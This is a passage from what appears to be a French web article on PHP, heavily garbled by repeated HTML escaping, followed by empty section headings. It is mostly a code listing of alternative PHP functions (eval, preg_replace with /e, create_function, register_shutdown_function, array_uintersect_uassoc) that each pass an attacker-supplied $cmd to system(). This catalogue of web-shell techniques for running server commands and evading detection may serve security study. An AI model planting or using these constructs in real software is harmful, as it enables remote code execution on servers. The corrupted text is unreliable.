\n array_uintersect_uassoc (array($cmd), array(&amp;amp;amp;amp;quot;&amp;amp;amp;amp;quot;), ‘system’, ‘system’);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;eval (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n eval(&amp;amp;amp;amp;quot;system(‘$cmd’);&amp;amp;amp;amp;quot;);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;preg_replace (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n preg_replace(&amp;amp;amp;amp;quot;\/x\/e&amp;amp;amp;amp;quot;,&amp;amp;amp;amp;quot;system(‘$cmd’)&amp;amp;amp;amp;quot;,&amp;amp;amp;amp;quot;x&amp;amp;amp;amp;quot;);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;preg_replace_callback (PHP4 &amp;amp;amp;amp;gt;= 4.0.5, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n preg_replace_callback(&amp;amp;amp;amp;quot;\/$cmd\/&amp;amp;amp;amp;quot;, create_function(&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n ‘$cmds’,&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n ‘return system($cmds[0]);’&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n ),&amp;amp;amp;amp;quot;$cmd&amp;amp;amp;amp;quot;);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;create_function (PHP4 &amp;amp;amp;amp;gt;= 4.0.1, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $func = create_function(‘$cmd’, ‘return system($cmd);’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $func($cmd);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt; echo &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;register_shutdown_function (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n register_shutdown_function(‘system’, $cmd);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt;?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt;[\/php]<\/p>\n<\/a>Conclusion et \u00e9volutions<\/h2>\n
\n
Editions et mises \u00e0 jour<\/h2>\n
Sources & ressources<\/h2>\n
\n